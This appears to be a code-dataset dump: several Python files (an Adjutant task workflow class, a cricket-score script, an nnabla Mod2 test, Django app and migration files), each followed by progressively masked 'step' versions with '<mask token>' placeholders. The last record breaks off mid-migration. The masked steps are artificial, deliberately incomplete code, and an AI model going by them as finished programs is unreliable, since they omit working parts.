token_expiry = None\n action_config = None\n email_config = None\n notification_config = None\n\n def __init__(self, task_model=None, task_data=None, action_data=None):\n self._config = None\n self.logger = getLogger(\"adjutant\")\n\n if task_model:\n self.task = task_model\n self._refresh_actions()\n else:\n # raises 400 validation error\n action_serializer_list = self._instantiate_action_serializers(action_data)\n\n hash_key = self._create_task_hash(action_serializer_list)\n # raises duplicate error\n self._handle_duplicates(hash_key)\n\n keystone_user = task_data.get(\"keystone_user\", {})\n self.task = Task.objects.create(\n keystone_user=keystone_user,\n project_id=keystone_user.get(\"project_id\"),\n task_type=self.task_type,\n hash_key=hash_key,\n )\n self.task.save()\n\n # Instantiate actions with serializers\n self.actions = []\n for i, action in enumerate(action_serializer_list):\n data = action[\"serializer\"].validated_data\n\n # construct the action class\n self.actions.append(\n action[\"action\"](data=data, task=self.task, order=i)\n )\n self.logger.info(\n \"(%s) - '%s' task created (%s).\"\n % (timezone.now(), self.task_type, self.task.uuid)\n )\n\n def _instantiate_action_serializers(self, action_data, use_existing_actions=False):\n action_serializer_list = []\n\n if use_existing_actions:\n actions = self.actions\n else:\n actions = self.default_actions[:]\n actions += self.config.additional_actions\n\n # instantiate all action serializers and check validity\n valid = True\n for action in actions:\n if use_existing_actions:\n action_name = action.action.action_name\n else:\n action_name = action\n\n action_class = adj_actions.ACTION_CLASSES[action_name]\n\n if use_existing_actions:\n action_class = action\n\n # instantiate serializer class\n if not action_class.serializer:\n raise exceptions.SerializerMissingException(\n \"No serializer defined for action %s\" % action_name\n )\n serializer = action_class.serializer(data=action_data)\n\n action_serializer_list.append(\n {\"name\": action_name, \"action\": action_class, \"serializer\": serializer}\n )\n\n if serializer and not serializer.is_valid():\n valid = False\n\n if not valid:\n errors = {}\n for action in action_serializer_list:\n if action[\"serializer\"]:\n errors.update(action[\"serializer\"].errors)\n raise exceptions.TaskSerializersInvalid(errors)\n\n return action_serializer_list\n\n def _create_task_hash(self, action_list):\n hashable_list = [\n self.task_type,\n ]\n\n for action in action_list:\n hashable_list.append(action[\"name\"])\n if not action[\"serializer\"]:\n continue\n # iterate like this to maintain consistent order for hash\n fields = sorted(action[\"serializer\"].validated_data.keys())\n for field in fields:\n try:\n hashable_list.append(action[\"serializer\"].validated_data[field])\n except KeyError:\n if field == \"username\" and CONF.identity.username_is_email:\n continue\n else:\n raise\n\n return hashlib.sha256(str(hashable_list).encode(\"utf-8\")).hexdigest()\n\n def _handle_duplicates(self, hash_key):\n duplicate_tasks = Task.objects.filter(\n hash_key=hash_key, completed=0, cancelled=0\n )\n\n if not duplicate_tasks:\n return\n\n if self.duplicate_policy == \"cancel\":\n now = timezone.now()\n self.logger.info(\"(%s) - Task is a duplicate - Cancelling old tasks.\" % now)\n for task in duplicate_tasks:\n task.add_task_note(\n \"Task cancelled because was an old duplicate. 
- (%s)\" % now\n )\n task.get_task().cancel()\n return\n\n raise exceptions.TaskDuplicateFound()\n\n def _refresh_actions(self):\n self.actions = [a.get_action() for a in self.task.actions]\n\n def _create_token(self):\n self.clear_tokens()\n token_expiry = self.config.token_expiry or self.token_expiry\n token = create_token(self.task, token_expiry)\n self.add_note(\"Token created for task.\")\n try:\n # will throw a key error if the token template has not\n # been specified\n email_conf = self.config.emails.token\n send_stage_email(self.task, email_conf, token)\n except KeyError as e:\n handle_task_error(e, self.task, error_text=\"while sending token\")\n\n def add_note(self, note):\n \"\"\"\n Logs the note, and also adds it to the task notes.\n \"\"\"\n now = timezone.now()\n self.logger.info(\n \"(%s)(%s)(%s) - %s\" % (now, self.task_type, self.task.uuid, note)\n )\n note = \"%s - (%s)\" % (note, now)\n self.task.add_task_note(note)\n\n @property\n def config(self):\n \"\"\"Get my config.\n\n Returns a dict of the config for this task.\n \"\"\"\n if self._config is None:\n try:\n task_conf = CONF.workflow.tasks[self.task_type]\n except KeyError:\n task_conf = {}\n self._config = CONF.workflow.task_defaults.overlay(task_conf)\n return self._config\n\n def is_valid(self, internal_message=None):\n self._refresh_actions()\n valid = all([act.valid for act in self.actions])\n if not valid:\n # TODO(amelia): get action invalidation reasons and raise those\n raise exceptions.TaskActionsInvalid(\n self.task, \"actions invalid\", internal_message\n )\n\n @property\n def approved(self):\n return self.task.approved\n\n @property\n def completed(self):\n return self.task.completed\n\n @property\n def cancelled(self):\n return self.task.cancelled\n\n def confirm_state(self, approved=None, completed=None, cancelled=None):\n \"\"\"Check that the Task is in a given state.\n\n None value means state is ignored. 
Otherwise expects true or false.\n \"\"\"\n if completed is not None:\n if self.task.completed and not completed:\n raise exceptions.TaskStateInvalid(\n self.task, \"This task has already been completed.\"\n )\n if not self.task.completed and completed:\n raise exceptions.TaskStateInvalid(\n self.task, \"This task hasn't been completed.\"\n )\n\n if cancelled is not None:\n if self.task.cancelled and not cancelled:\n raise exceptions.TaskStateInvalid(\n self.task, \"This task has been cancelled.\"\n )\n if not self.task.cancelled and cancelled:\n raise exceptions.TaskStateInvalid(\n self.task, \"This task has not been cancelled.\"\n )\n if approved is not None:\n if self.task.approved and not approved:\n raise exceptions.TaskStateInvalid(\n self.task, \"This task has already been approved.\"\n )\n if not self.task.approved and approved:\n raise exceptions.TaskStateInvalid(\n self.task, \"This task has not been approved.\"\n )\n\n def update(self, action_data):\n self.confirm_state(approved=False, completed=False, cancelled=False)\n\n action_serializer_list = self._instantiate_action_serializers(\n action_data, use_existing_actions=True\n )\n\n hash_key = self._create_task_hash(action_serializer_list)\n self._handle_duplicates(hash_key)\n\n for action in action_serializer_list:\n data = action[\"serializer\"].validated_data\n\n action[\"action\"].action.action_data = data\n action[\"action\"].action.save()\n self._refresh_actions()\n self.prepare()\n\n def prepare(self):\n \"\"\"Run the prepare stage for all the actions.\n\n If the task can be auto approved, this will also run the approve\n stage.\n \"\"\"\n\n self.confirm_state(approved=False, completed=False, cancelled=False)\n\n for action in self.actions:\n try:\n action.prepare()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\"while setting up task\")\n\n # send initial confirmation email:\n email_conf = self.config.emails.initial\n send_stage_email(self.task, email_conf)\n\n approve_list = [act.auto_approve for act in self.actions]\n\n # TODO(amelia): It would be nice to explicitly test this, however\n # currently we don't have the right combinations of\n # actions to allow for it.\n if False in approve_list:\n can_auto_approve = False\n elif True in approve_list:\n can_auto_approve = True\n else:\n can_auto_approve = False\n\n if self.config.allow_auto_approve is not None:\n allow_auto_approve = self.config.allow_auto_approve\n else:\n allow_auto_approve = self.allow_auto_approve\n\n if can_auto_approve and not allow_auto_approve:\n self.add_note(\"Actions allow auto aproval, but task does not.\")\n elif can_auto_approve:\n self.add_note(\"Action allow auto approval. 
Auto approving.\")\n self.approve()\n return\n\n if self.send_approval_notification:\n notes = {\"notes\": [\"'%s' task needs approval.\" % self.task_type]}\n create_notification(self.task, notes)\n\n def approve(self, approved_by=\"system\"):\n \"\"\"Run the approve stage for all the actions.\"\"\"\n\n self.confirm_state(completed=False, cancelled=False)\n\n self.is_valid(\"task invalid before approval\")\n\n # We approve the task before running actions,\n # that way if something goes wrong we know if it was approved,\n # when it was approved, and who approved it.\n self.task.approved = True\n self.task.approved_on = timezone.now()\n self.task.approved_by = approved_by\n self.task.save()\n\n # approve all actions\n for action in self.actions:\n try:\n action.approve()\n except Exception as e:\n handle_task_error(e, self.task, error_text=\"while approving task\")\n\n self.is_valid(\"task invalid after approval\")\n\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n else:\n self.submit()\n\n def reissue_token(self):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n\n need_token = any([act.need_token for act in self.actions])\n if need_token:\n self._create_token()\n\n def clear_tokens(self):\n for token in self.task.tokens:\n token.delete()\n\n def submit(self, token_data=None, keystone_user=None):\n self.confirm_state(approved=True, completed=False, cancelled=False)\n\n required_fields = set()\n actions = []\n for action in self.task.actions:\n a = action.get_action()\n actions.append(a)\n for field in a.token_fields:\n required_fields.add(field)\n\n if not token_data:\n token_data = {}\n\n errors = {}\n data = {}\n\n for field in required_fields:\n try:\n data[field] = token_data[field]\n except KeyError:\n errors[field] = [\n \"This field is required.\",\n ]\n except TypeError:\n errors = [\"Improperly formated json. \" \"Should be a key-value object.\"]\n break\n\n if errors:\n raise exceptions.TaskTokenSerializersInvalid(self.task, errors)\n\n self.is_valid(\"task invalid before submit\")\n\n for action in actions:\n try:\n action.submit(data, keystone_user)\n except Exception as e:\n handle_task_error(e, self.task, \"while submiting task\")\n\n self.is_valid(\"task invalid after submit\")\n\n self.task.completed = True\n self.task.completed_on = timezone.now()\n self.task.save()\n for token in self.task.tokens:\n token.delete()\n\n # Sending confirmation email:\n email_conf = self.config.emails.completed\n send_stage_email(self.task, email_conf)\n\n def cancel(self):\n self.confirm_state(completed=False, cancelled=False)\n self.clear_tokens()\n self.task.cancelled = True\n self.task.save()\n", "step-ids": [ 14, 17, 18, 20, 26 ] }
[ 14, 17, 18, 20, 26 ]
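Editor's note: a minimal, self-contained sketch of the duplicate-detection scheme in the BaseTask code above — the task type, each action name, and the action's validated fields (sorted for a stable order) are stringified and hashed with SHA-256. The function name and sample values below are illustrative, not part of the Adjutant API.

import hashlib

def task_hash(task_type, actions):
    # actions: list of (action_name, validated_data) pairs,
    # mirroring what _create_task_hash collects
    hashable_list = [task_type]
    for name, data in actions:
        hashable_list.append(name)
        for field in sorted(data.keys()):  # stable field order -> stable hash
            hashable_list.append(data[field])
    return hashlib.sha256(str(hashable_list).encode("utf-8")).hexdigest()

# Two identical submissions yield the same key, which is what
# _handle_duplicates filters on.
print(task_hash("create_project", [("NewProjectAction", {"name": "demo"})]))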
run = []  # list of runs scored by each player
no_players = int(input("Enter the number of players in the team: "))
for i in range(no_players):
    run_score = int(input("Enter the runs scored by player " + str(i + 1) + ": "))
    run.append(run_score)

# Average score of the team
def average(run):
    print("____________________________________")
    total = 0
    for i in range(0, len(run)):
        total += run[i]
    avg = total / len(run)
    print("Average score of the team is:", avg)

# Maximum runs scored by a player in the team
def high(run):
    print("______________________________________")
    max_runs = run[0]
    for i in range(len(run)):
        if max_runs < run[i]:
            max_runs = run[i]
    print("Highest runs scored by a player:", max_runs)

# Minimum runs scored by a player in the team
def low(run):
    print("____________________________________")
    min_runs = run[0]
    for i in range(len(run)):
        if min_runs > run[i]:
            min_runs = run[i]
    print("Lowest runs scored by a player:", min_runs)

# Count of players who scored 50 runs or more
def check(run):
    print("_______________________________________")
    count = 0
    for i in range(0, len(run)):
        if run[i] >= 50:
            count += 1
    print("Players who scored 50 runs or more:", count)

# Run value that occurs with the highest frequency
def feq(run):
    print("___________________________________")
    max_freq = 0
    result = run[0]
    for i in run:
        freq = run.count(i)
        if freq > max_freq:
            max_freq = freq
            result = i
    print(f"Run value with the highest frequency is {result} (occurs {max_freq} times)")
    print("-------------THANKYOU---------------")

average(run)
high(run)
low(run)
check(run)
feq(run)
normal
{ "blob_id": "3d7ca468a1f7aa1602bff22167e9550ad515fa79", "index": 4777, "step-1": "<mask token>\n\n\ndef average(run):\n print('____________________________________')\n sum = 0\n for i in range(0, len(run)):\n sum += run[i]\n avg = sum / len(run)\n print('Average score of the team is :', avg)\n\n\ndef high(run):\n print('______________________________________')\n max = run[0]\n for i in range(len(run)):\n if max < run[i]:\n max = run[i]\n print('Highest run score by the player is :', max)\n\n\ndef low(run):\n print('____________________________________')\n mim = run[0]\n for i in range(len(run)):\n if mim > run[i]:\n mim = run[i]\n print('Lowest runs scored by the player is :', mim)\n\n\ndef check(run):\n print('_______________________________________')\n count = 0\n for i in range(0, len(run)):\n if run[i] >= 50:\n count += 1\n else:\n pass\n print(\"Count of the player score more than '50' are :\", count)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef average(run):\n print('____________________________________')\n sum = 0\n for i in range(0, len(run)):\n sum += run[i]\n avg = sum / len(run)\n print('Average score of the team is :', avg)\n\n\ndef high(run):\n print('______________________________________')\n max = run[0]\n for i in range(len(run)):\n if max < run[i]:\n max = run[i]\n print('Highest run score by the player is :', max)\n\n\ndef low(run):\n print('____________________________________')\n mim = run[0]\n for i in range(len(run)):\n if mim > run[i]:\n mim = run[i]\n print('Lowest runs scored by the player is :', mim)\n\n\ndef check(run):\n print('_______________________________________')\n count = 0\n for i in range(0, len(run)):\n if run[i] >= 50:\n count += 1\n else:\n pass\n print(\"Count of the player score more than '50' are :\", count)\n\n\ndef feq(run):\n print('___________________________________')\n max = 0\n result = run[0]\n for i in run:\n freq = run.count(i)\n if freq > max:\n max = freq\n result = i\n print(f'run scored with the highest frequncy {result} is', max)\n print(\"-------------'THANKYOU---------------\")\n\n\n<mask token>\n", "step-3": "<mask token>\nfor i in range(no_players):\n run_score = int(input('Enter the runs scored by the player ' + str(i + \n 1) + ':'))\n run.append(run_score)\n\n\ndef average(run):\n print('____________________________________')\n sum = 0\n for i in range(0, len(run)):\n sum += run[i]\n avg = sum / len(run)\n print('Average score of the team is :', avg)\n\n\ndef high(run):\n print('______________________________________')\n max = run[0]\n for i in range(len(run)):\n if max < run[i]:\n max = run[i]\n print('Highest run score by the player is :', max)\n\n\ndef low(run):\n print('____________________________________')\n mim = run[0]\n for i in range(len(run)):\n if mim > run[i]:\n mim = run[i]\n print('Lowest runs scored by the player is :', mim)\n\n\ndef check(run):\n print('_______________________________________')\n count = 0\n for i in range(0, len(run)):\n if run[i] >= 50:\n count += 1\n else:\n pass\n print(\"Count of the player score more than '50' are :\", count)\n\n\ndef feq(run):\n print('___________________________________')\n max = 0\n result = run[0]\n for i in run:\n freq = run.count(i)\n if freq > max:\n max = freq\n result = i\n print(f'run scored with the highest frequncy {result} is', max)\n print(\"-------------'THANKYOU---------------\")\n\n\naverage(run)\nhigh(run)\nlow(run)\ncheck(run)\nfeq(run)\n", "step-4": "run = []\nno_players = int(input('enter the number of the players in the team :'))\nfor i 
in range(no_players):\n run_score = int(input('Enter the runs scored by the player ' + str(i + \n 1) + ':'))\n run.append(run_score)\n\n\ndef average(run):\n print('____________________________________')\n sum = 0\n for i in range(0, len(run)):\n sum += run[i]\n avg = sum / len(run)\n print('Average score of the team is :', avg)\n\n\ndef high(run):\n print('______________________________________')\n max = run[0]\n for i in range(len(run)):\n if max < run[i]:\n max = run[i]\n print('Highest run score by the player is :', max)\n\n\ndef low(run):\n print('____________________________________')\n mim = run[0]\n for i in range(len(run)):\n if mim > run[i]:\n mim = run[i]\n print('Lowest runs scored by the player is :', mim)\n\n\ndef check(run):\n print('_______________________________________')\n count = 0\n for i in range(0, len(run)):\n if run[i] >= 50:\n count += 1\n else:\n pass\n print(\"Count of the player score more than '50' are :\", count)\n\n\ndef feq(run):\n print('___________________________________')\n max = 0\n result = run[0]\n for i in run:\n freq = run.count(i)\n if freq > max:\n max = freq\n result = i\n print(f'run scored with the highest frequncy {result} is', max)\n print(\"-------------'THANKYOU---------------\")\n\n\naverage(run)\nhigh(run)\nlow(run)\ncheck(run)\nfeq(run)\n", "step-5": "run=[] #Creating a empty list \r\nno_players=int(input(\"enter the number of the players in the team :\")) \r\nfor i in range (no_players):\r\n run_score=int(input(\"Enter the runs scored by the player \"+str(i+1)+\":\"))\r\n run.append(run_score)\r\n#code for the average score of the team\r\ndef average(run):\r\n print(\"____________________________________\")\r\n sum=0\r\n for i in range (0,len(run)):\r\n sum+=run[i]\r\n avg=sum/len(run)\r\n print(\"Average score of the team is :\",avg)\r\n#code for the maximun runs scored by the players in the team\r\ndef high(run):\r\n print(\"______________________________________\")\r\n max=run[0]\r\n for i in range(len(run)):\r\n if max<run[i]:\r\n max=run[i]\r\n print(\"Highest run score by the player is :\",max)\r\n#code for the minimum runs scored by the players in the team\r\ndef low(run):\r\n print(\"____________________________________\")\r\n mim=run[0]\r\n for i in range(len(run)):\r\n if mim>run[i]:\r\n mim=run[i]\r\n print(\"Lowest runs scored by the player is :\",mim)\r\n#code for the runs scored more than 50 runs in the the team\r\ndef check(run): \r\n print(\"_______________________________________\") \r\n count=0\r\n for i in range(0,len(run)):\r\n if run[i]>=50:\r\n count+=1\r\n else:\r\n pass\r\n print(\"Count of the player score more than '50' are :\",count)\r\n#code for the runs scored for higher number of the frequency\r\ndef feq(run):\r\n print(\"___________________________________\")\r\n max=0\r\n result=run[0]\r\n for i in run:\r\n freq=run.count(i)\r\n if freq>max:\r\n max=freq\r\n result=i\r\n \r\n print(f\"run scored with the highest frequncy {result} is\",max)\r\n print(\"-------------'THANKYOU---------------\")\r\n\r\naverage(run)\r\nhigh(run)\r\nlow(run)\r\ncheck(run)\r\nfeq(run)\r\n\r\n\r\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
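For comparison, the statistics computed by hand above map directly onto Python built-ins; a sketch with an assumed sample list:

from collections import Counter

runs = [34, 50, 12, 50, 7]  # illustrative scores
print("Average:", sum(runs) / len(runs))
print("Highest:", max(runs))
print("Lowest:", min(runs))
print("Scored 50 or more:", sum(1 for r in runs if r >= 50))
score, freq = Counter(runs).most_common(1)[0]
print(f"Most frequent score {score} occurs {freq} times")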
# Copyright 2023 Sony Group Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import pytest import numpy as np import nnabla.functions as F from nbla_test_utils import list_context ctxs = list_context('Mod2') def ref_mod2(x0, x1, fmod): if x0.dtype == np.float32 or fmod == True: return np.fmod(x0, x1) else: return np.mod(x0, x1) @pytest.mark.parametrize("ctx, func_name", ctxs) @pytest.mark.parametrize("x0_shape, x1_shape", [ ((2, 3, 4), (2, 3, 4)), ((2, 3, 4), (1, 1, 1)), ((1, 1, 1), (2, 3, 4)), ]) @pytest.mark.parametrize('fmod', [False, True]) @pytest.mark.parametrize('dtype', [np.float32, np.int32]) @pytest.mark.parametrize("seed", [313]) def test_mod2_forward(seed, x0_shape, x1_shape, fmod, dtype, ctx, func_name): from nbla_test_utils import function_tester rng = np.random.RandomState(seed) if dtype == np.float32: inputs = [rng.randn(*x0_shape).astype(dtype), rng.randn(*x1_shape).astype(dtype)] else: inputs = [rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max, x0_shape).astype(dtype), rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max, x1_shape).astype(dtype)] backward = [False, False] func_args = [fmod] function_tester(rng, F.mod2, ref_mod2, inputs, func_name=func_name, func_args=func_args, atol_f=0, ctx=ctx, backward=backward)
normal
{ "blob_id": "32f10c3e73a3d792416f6b2841a80f8b3c390e8c", "index": 9194, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef ref_mod2(x0, x1, fmod):\n if x0.dtype == np.float32 or fmod == True:\n return np.fmod(x0, x1)\n else:\n return np.mod(x0, x1)\n\n\[email protected]('ctx, func_name', ctxs)\[email protected]('x0_shape, x1_shape', [((2, 3, 4), (2, 3, 4)), ((2,\n 3, 4), (1, 1, 1)), ((1, 1, 1), (2, 3, 4))])\[email protected]('fmod', [False, True])\[email protected]('dtype', [np.float32, np.int32])\[email protected]('seed', [313])\ndef test_mod2_forward(seed, x0_shape, x1_shape, fmod, dtype, ctx, func_name):\n from nbla_test_utils import function_tester\n rng = np.random.RandomState(seed)\n if dtype == np.float32:\n inputs = [rng.randn(*x0_shape).astype(dtype), rng.randn(*x1_shape).\n astype(dtype)]\n else:\n inputs = [rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max,\n x0_shape).astype(dtype), rng.randint(np.iinfo(dtype).min, np.\n iinfo(dtype).max, x1_shape).astype(dtype)]\n backward = [False, False]\n func_args = [fmod]\n function_tester(rng, F.mod2, ref_mod2, inputs, func_name=func_name,\n func_args=func_args, atol_f=0, ctx=ctx, backward=backward)\n", "step-3": "<mask token>\nctxs = list_context('Mod2')\n\n\ndef ref_mod2(x0, x1, fmod):\n if x0.dtype == np.float32 or fmod == True:\n return np.fmod(x0, x1)\n else:\n return np.mod(x0, x1)\n\n\[email protected]('ctx, func_name', ctxs)\[email protected]('x0_shape, x1_shape', [((2, 3, 4), (2, 3, 4)), ((2,\n 3, 4), (1, 1, 1)), ((1, 1, 1), (2, 3, 4))])\[email protected]('fmod', [False, True])\[email protected]('dtype', [np.float32, np.int32])\[email protected]('seed', [313])\ndef test_mod2_forward(seed, x0_shape, x1_shape, fmod, dtype, ctx, func_name):\n from nbla_test_utils import function_tester\n rng = np.random.RandomState(seed)\n if dtype == np.float32:\n inputs = [rng.randn(*x0_shape).astype(dtype), rng.randn(*x1_shape).\n astype(dtype)]\n else:\n inputs = [rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max,\n x0_shape).astype(dtype), rng.randint(np.iinfo(dtype).min, np.\n iinfo(dtype).max, x1_shape).astype(dtype)]\n backward = [False, False]\n func_args = [fmod]\n function_tester(rng, F.mod2, ref_mod2, inputs, func_name=func_name,\n func_args=func_args, atol_f=0, ctx=ctx, backward=backward)\n", "step-4": "import pytest\nimport numpy as np\nimport nnabla.functions as F\nfrom nbla_test_utils import list_context\nctxs = list_context('Mod2')\n\n\ndef ref_mod2(x0, x1, fmod):\n if x0.dtype == np.float32 or fmod == True:\n return np.fmod(x0, x1)\n else:\n return np.mod(x0, x1)\n\n\[email protected]('ctx, func_name', ctxs)\[email protected]('x0_shape, x1_shape', [((2, 3, 4), (2, 3, 4)), ((2,\n 3, 4), (1, 1, 1)), ((1, 1, 1), (2, 3, 4))])\[email protected]('fmod', [False, True])\[email protected]('dtype', [np.float32, np.int32])\[email protected]('seed', [313])\ndef test_mod2_forward(seed, x0_shape, x1_shape, fmod, dtype, ctx, func_name):\n from nbla_test_utils import function_tester\n rng = np.random.RandomState(seed)\n if dtype == np.float32:\n inputs = [rng.randn(*x0_shape).astype(dtype), rng.randn(*x1_shape).\n astype(dtype)]\n else:\n inputs = [rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max,\n x0_shape).astype(dtype), rng.randint(np.iinfo(dtype).min, np.\n iinfo(dtype).max, x1_shape).astype(dtype)]\n backward = [False, False]\n func_args = [fmod]\n function_tester(rng, F.mod2, ref_mod2, inputs, func_name=func_name,\n func_args=func_args, atol_f=0, ctx=ctx, backward=backward)\n", "step-5": "# Copyright 2023 Sony Group 
Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pytest\nimport numpy as np\nimport nnabla.functions as F\nfrom nbla_test_utils import list_context\n\nctxs = list_context('Mod2')\n\n\ndef ref_mod2(x0, x1, fmod):\n if x0.dtype == np.float32 or fmod == True:\n return np.fmod(x0, x1)\n else:\n return np.mod(x0, x1)\n\n\[email protected](\"ctx, func_name\", ctxs)\[email protected](\"x0_shape, x1_shape\", [\n ((2, 3, 4), (2, 3, 4)),\n ((2, 3, 4), (1, 1, 1)),\n ((1, 1, 1), (2, 3, 4)),\n])\[email protected]('fmod', [False, True])\[email protected]('dtype', [np.float32, np.int32])\[email protected](\"seed\", [313])\ndef test_mod2_forward(seed, x0_shape, x1_shape, fmod, dtype, ctx, func_name):\n from nbla_test_utils import function_tester\n rng = np.random.RandomState(seed)\n if dtype == np.float32:\n inputs = [rng.randn(*x0_shape).astype(dtype),\n rng.randn(*x1_shape).astype(dtype)]\n else:\n inputs = [rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max, x0_shape).astype(dtype),\n rng.randint(np.iinfo(dtype).min, np.iinfo(dtype).max, x1_shape).astype(dtype)]\n backward = [False, False]\n func_args = [fmod]\n function_tester(rng, F.mod2, ref_mod2, inputs,\n func_name=func_name, func_args=func_args,\n atol_f=0, ctx=ctx, backward=backward)\n", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
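The branch in ref_mod2 matters for negative operands: numpy's mod takes the sign of the divisor, while fmod (the C-style remainder) takes the sign of the dividend. A quick demonstration:

import numpy as np

x0 = np.array([-7, 7], dtype=np.int32)
x1 = np.array([3, -3], dtype=np.int32)
print(np.mod(x0, x1))   # [ 2 -2] -> follows the sign of the divisor
print(np.fmod(x0, x1))  # [-1  1] -> follows the sign of the dividend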
from django.apps import AppConfig class ActivityConfig(AppConfig): name = 'apps.activity'
normal
{ "blob_id": "2a69aa0cd9d0e39ad82d6a354e956bdad0648797", "index": 2252, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass ActivityConfig(AppConfig):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass ActivityConfig(AppConfig):\n name = 'apps.activity'\n", "step-4": "from django.apps import AppConfig\n\n\nclass ActivityConfig(AppConfig):\n name = 'apps.activity'\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
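Assuming a standard Django project layout (the settings module is not shown in the source), the config class above takes effect once the app is listed in settings; an illustrative snippet:

# settings.py (illustrative)
INSTALLED_APPS = [
    'django.contrib.contenttypes',
    'django.contrib.auth',
    'apps.activity.apps.ActivityConfig',  # explicit path to the AppConfig above
]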
# -*- coding: utf-8 -*- # Generated by Django 1.10.3 on 2018-12-20 13:06 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('login', '0006_usermovies_img'), ] operations = [ migrations.AddField( model_name='moviesinfo', name='country', field=models.CharField(default=1, max_length=50), preserve_default=False, ), migrations.AddField( model_name='moviesinfo', name='description', field=models.CharField(default=1, max_length=200), preserve_default=False, ), migrations.AddField( model_name='moviesinfo', name='director', field=models.CharField(default=1, max_length=100), preserve_default=False, ), migrations.AddField( model_name='moviesinfo', name='grenre', field=models.CharField(default=1, max_length=50), preserve_default=False, ), migrations.AddField( model_name='moviesinfo', name='year', field=models.CharField(default=1, max_length=8), preserve_default=False, ), migrations.AddField( model_name='usermovies', name='country', field=models.CharField(default=1, max_length=50), preserve_default=False, ), migrations.AddField( model_name='usermovies', name='description', field=models.CharField(default=1, max_length=200), preserve_default=False, ), migrations.AddField( model_name='usermovies', name='director', field=models.CharField(default=1, max_length=100), preserve_default=False, ), migrations.AddField( model_name='usermovies', name='grenre', field=models.CharField(default=1, max_length=50), preserve_default=False, ), migrations.AddField( model_name='usermovies', name='year', field=models.CharField(default=1, max_length=8), preserve_default=False, ), ]
normal
{ "blob_id": "e67cbddf10440e8a31373e05a82840677d3045f5", "index": 4388, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('login', '0006_usermovies_img')]\n operations = [migrations.AddField(model_name='moviesinfo', name=\n 'country', field=models.CharField(default=1, max_length=50),\n preserve_default=False), migrations.AddField(model_name=\n 'moviesinfo', name='description', field=models.CharField(default=1,\n max_length=200), preserve_default=False), migrations.AddField(\n model_name='moviesinfo', name='director', field=models.CharField(\n default=1, max_length=100), preserve_default=False), migrations.\n AddField(model_name='moviesinfo', name='grenre', field=models.\n CharField(default=1, max_length=50), preserve_default=False),\n migrations.AddField(model_name='moviesinfo', name='year', field=\n models.CharField(default=1, max_length=8), preserve_default=False),\n migrations.AddField(model_name='usermovies', name='country', field=\n models.CharField(default=1, max_length=50), preserve_default=False),\n migrations.AddField(model_name='usermovies', name='description',\n field=models.CharField(default=1, max_length=200), preserve_default\n =False), migrations.AddField(model_name='usermovies', name=\n 'director', field=models.CharField(default=1, max_length=100),\n preserve_default=False), migrations.AddField(model_name=\n 'usermovies', name='grenre', field=models.CharField(default=1,\n max_length=50), preserve_default=False), migrations.AddField(\n model_name='usermovies', name='year', field=models.CharField(\n default=1, max_length=8), preserve_default=False)]\n", "step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('login', '0006_usermovies_img')]\n operations = [migrations.AddField(model_name='moviesinfo', name=\n 'country', field=models.CharField(default=1, max_length=50),\n preserve_default=False), migrations.AddField(model_name=\n 'moviesinfo', name='description', field=models.CharField(default=1,\n max_length=200), preserve_default=False), migrations.AddField(\n model_name='moviesinfo', name='director', field=models.CharField(\n default=1, max_length=100), preserve_default=False), migrations.\n AddField(model_name='moviesinfo', name='grenre', field=models.\n CharField(default=1, max_length=50), preserve_default=False),\n migrations.AddField(model_name='moviesinfo', name='year', field=\n models.CharField(default=1, max_length=8), preserve_default=False),\n migrations.AddField(model_name='usermovies', name='country', field=\n models.CharField(default=1, max_length=50), preserve_default=False),\n migrations.AddField(model_name='usermovies', name='description',\n field=models.CharField(default=1, max_length=200), preserve_default\n =False), migrations.AddField(model_name='usermovies', name=\n 'director', field=models.CharField(default=1, max_length=100),\n preserve_default=False), migrations.AddField(model_name=\n 'usermovies', name='grenre', field=models.CharField(default=1,\n max_length=50), preserve_default=False), migrations.AddField(\n model_name='usermovies', name='year', field=models.CharField(\n default=1, max_length=8), preserve_default=False)]\n", "step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.3 on 2018-12-20 13:06\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, 
